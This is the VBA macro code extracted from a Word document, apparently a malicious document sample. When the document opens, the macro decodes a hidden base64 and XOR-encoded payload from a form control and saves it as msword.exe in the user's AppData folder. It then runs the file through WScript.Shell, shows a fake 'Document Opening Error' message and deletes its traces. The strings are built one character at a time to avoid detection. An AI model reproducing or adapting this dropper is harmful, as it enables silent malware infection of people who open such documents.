Attribute VB_Name = "MSWORD"
Attribute VB_Base = "0{92B73015-F232-45A9-B285-96C75564D970}{AC636B69-7B39-4AF2-9954-AA070C1DD8F8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False




Private Sub twotxt_Change()

End Sub

Private Sub txtVBS_Change()

End Sub

Private Sub jahaenx_Change()

End Sub
Attribute VB_Name = "Module1"
Private Sub Delete_File(ByVal strPath As String)
Dim objFSO As Object

Set objFSO = CreateObject("Scripting.FileSystemObject")
On Error GoTo lblError:

objFSO.deletefile (strPath)

Set objFSO = Nothing
Exit Sub


lblError:
Err.Clear
End Sub



Public Sub compelir()


Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"


Dim fpx As String: fpx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)

Const foForReading = 1
Const foAsASCII = 0
Const adSaveCreateOverWrite = 2
Const adTypeBinary = 1



Dim objFSO
Dim objFileIn
Dim objStreamIn


Dim objXML
Dim objDocElem


Dim objStream


Set objFSO = CreateObject("Scripting.FileSystemObject")



Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("Base64Data")
objDocElem.DataType = "bin.base64"


objDocElem.Text = MSWORD.jahaenx.Text

Set objStream = CreateObject("ADODB.Stream")
objStream.Type = adTypeBinary
objStream.Open


objStream.Write objDocElem.NodeTypedValue
objStream.SaveToFile fpx & "\doubleenc"




Set objShell = Nothing




Set objFSO = Nothing
Set objFileIn = Nothing
Set objStreamIn = Nothing
Set objXML = Nothing
Set objDocElem = Nothing
Set objStream = Nothing
End Sub

Public Sub xes()
Dim arrKey, errResult
Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"


Dim fpx As String: fpx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)

arrKey = GetKey("xjnbvbX%$#@cdKeT""!@#$C%^&*(K(*&K^%$W@!&^%$#lx^&%$""")

errResult = Encode(fpx & "\doubleenc", fpx & "\doubledec", arrKey)
If errResult <> 0 Then
    ShowError errResult
End If
End Sub

Sub ShowError(myError)
    On Error Resume Next
    Err.Raise myError
    Err.Clear
    On Error GoTo 0
   
End Sub


Function Encode(myFileIn, myFileOut, arrCode)

    Dim i, objFSO, objFileIn, objFileOut, objStreamIn

    Const ForAppending = 8
    Const ForReading = 1
    Const ForWriting = 2
    Const TristateFalse = 0
    Const TristateMixed = -2
    Const TristateTrue = -1
    Const TristateUseDefault = -2

    
    On Error Resume Next

    
    If Not IsArray(arrCode) Then
        arrCode = Array(arrCode)
    End If

    
    For i = 0 To UBound(arrCode)
        If Not IsNumeric(arrCode(i)) Then
            
            Encode = 1032
            Exit Function
        End If
        If arrCode(i) < 0 Or arrCode(i) > 255 Then
                Encode = 1031
            Exit Function
        End If
    Next

    
    Set objFSO = CreateObject("Scripting.FileSystemObject")

   
    If objFSO.FileExists(myFileIn) Then
        Set objFileIn = objFSO.GetFile(myFileIn)
        Set objStreamIn = objFileIn.OpenAsTextStream(ForReading, TristateFalse)
    Else
        
        Encode = 53
        
        objStreamIn.Close
        Set objStreamIn = Nothing
        Set objFileIn = Nothing
        Set objFSO = Nothing
      
        Exit Function
    End If

  
    If objFSO.FileExists(myFileOut) Then
        
        Encode = 58
        
        objStreamIn.Close
        Set objStreamIn = Nothing
        Set objFileIn = Nothing
        Set objFSO = Nothing
        
        Exit Function
    Else
        Set objFileOut = objFSO.CreateTextFile(myFileOut, True, False)
    End If
    i = 0
    Do Until objStreamIn.AtEndOfStream
        i = (i + 1) \ (UBound(arrCode) + 1)
        objFileOut.Write Chr(Asc(objStreamIn.Read(1)) Xor arrCode(i))
    Loop

    
    objFileOut.Close
    objStreamIn.Close
    Set objStreamIn = Nothing
    Set objFileIn = Nothing
    Set objFileOut = Nothing
    Set objFSO = Nothing

    
    Encode = Err.Number

    ' Done
    Err.Clear
    On Error GoTo 0
End Function


Function GetKey(myPassPhrase)
    Dim i, arrCode()
    ReDim arrCode(Len(myPassPhrase) - 1)
    For i = 0 To UBound(arrCode)
        arrCode(i) = Asc(Mid(myPassPhrase, i + 1, 1))
    Next
    GetKey = arrCode
End Function

Public Sub compelir2()


Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx0108xx As String: xx0108xx = "S"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx0100cc As String: xx0100cc = "W"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"


Dim fpx As String: fpx = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101)

Const foForReading = 1
Const foAsASCII = 0
Const adSaveCreateOverWrite = 2
Const adTypeBinary = 1



Dim objFSO
Dim objFileIn
Dim objStreamIn


Dim objXML
Dim objDocElem


Dim objStream


Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objFileIn = objFSO.GetFile(fpx & "\doubledec")
Set objStreamIn = objFileIn.OpenAsTextStream(foForReading, foAsASCII)


Set objXML = CreateObject("MSXml2.DOMDocument")
Set objDocElem = objXML.createElement("Base64Data")
objDocElem.DataType = "bin.base64"


objDocElem.Text = objStreamIn.ReadAll()


Set objStream = CreateObject("ADODB.Stream")
objStream.Type = adTypeBinary
objStream.Open


objStream.Write objDocElem.NodeTypedValue
objStream.SaveToFile fpx & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105, adSaveCreateOverWrite

Dim xxxxxx: xxxxxx = xx0100cc & xx01005 & xx0108 & xx0108xx & xx0108 & xx0105 & xx010l2 & xx010l2
Set xxxxxx = CreateObject(xx0100cc & xx01005 & xx0103 & xx01004 & xx0109 & xx01002 & xx01006 & xx0100x1 & xx0108xx & xx0108 & xx0105 & xx010l2 & xx010l2)

Dim xx010let As String: xx010let = "e"
Dim xx010leX As String: xx010leX = "x"
Dim xx010led As String: xx010led = "\msword."

'xxxxxx.Run fpx & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105
xxxxxx.Run (Chr(34) & fpx & xx010led & xx010let & xx010leX & xx010let & Chr(34))


Set objShell = Nothing





Set objFSO = Nothing
Set objFileIn = Nothing
Set objStreamIn = Nothing
Set objXML = Nothing
Set objDocElem = Nothing
Set objStream = Nothing
End Sub


Sub delit()
 
Dim xx0101 As String: xx0101 = "A"
Dim xx00101 As String: xx00101 = "a"
Dim xx0104 As String: xx0104 = "d"
Dim xx0105 As String: xx0105 = "e"
Dim xx01007 As String: xx01007 = "u"
Dim xx01008 As String: xx01008 = "v"
Dim xx010a010x As String: xx010a010x = "ax"
Dim xx0109 As String: xx0109 = "i"
Dim xx01005 As String: xx01005 = "s"
Dim xx01006 As String: xx01006 = "t"
Dim xx010003 As String: xx010003 = "z"
Dim xx010a007x As String: xx010a007x = "az"

Dim xx01001 As String: xx01001 = "o"
Dim xx0106 As String: xx0106 = "f"
Dim xx0107 As String: xx0107 = "g"
Dim xx0108 As String: xx0108 = "h"
Dim xx010002 As String: xx010002 = "y"
Dim xx01004 As String: xx01004 = "r"

Dim xx01010 As String: xx01010 = "j"
Dim xx01011 As String: xx01011 = "k"
Dim xx010l2 As String: xx010l2 = "l"
Dim xx01013 As String: xx01013 = "m"
Dim xx0100x1 As String: xx0100x1 = "."
Dim xx01009 As String: xx01009 = "w"
Dim xx010001 As String: xx010001 = "x"

Dim xx01000 As String: xx01000 = "n"
Dim xx0102 As String: xx0102 = "b"

Dim xx01002 As String: xx01002 = "p"
Dim xx0103 As String: xx0103 = "c"
Dim xx010q03 As String: xx010q03 = "q"
Dim xx010l03 As String: xx010l03 = "\"

Dim xx010leW As String: xx010leW = "e"
Dim xx010leX As String: xx010leX = "x"
Dim xx010leL As String: xx010leL = "\msword."

   ' Dim fpl As String: fpl = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) & xx010l03 & xx01013 & xx01005 & xx01009 & xx01001 & xx01004 & xx0104 & xx0100x1 & xx0105 & xx010001 & xx0105
    Dim fple As String: fple = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) & "\doubleenc"
    Dim fpld As String: fpld = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) & "\doubledec"
    Dim dc As String: dc = Environ(xx0101 & xx01002 & xx01002 & xx0104 & xx00101 & xx01006 & xx00101) & xx010leL & xx010leW & xx010leX & xx010leW
   
    
    Call Delete_File(dc)
    Call Delete_File(fple)
    Call Delete_File(fpld)
End Sub



Sub DefaultMsgBox()
MsgBox "Document Opening Error: x0x1x0 x1x0x1 x0x0x1 x1x1x0"

End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Call delit
Call compelir
Call xes
Call compelir2
Call DefaultMsgBox
Call delit
End Sub


INQUEST-PP=macro
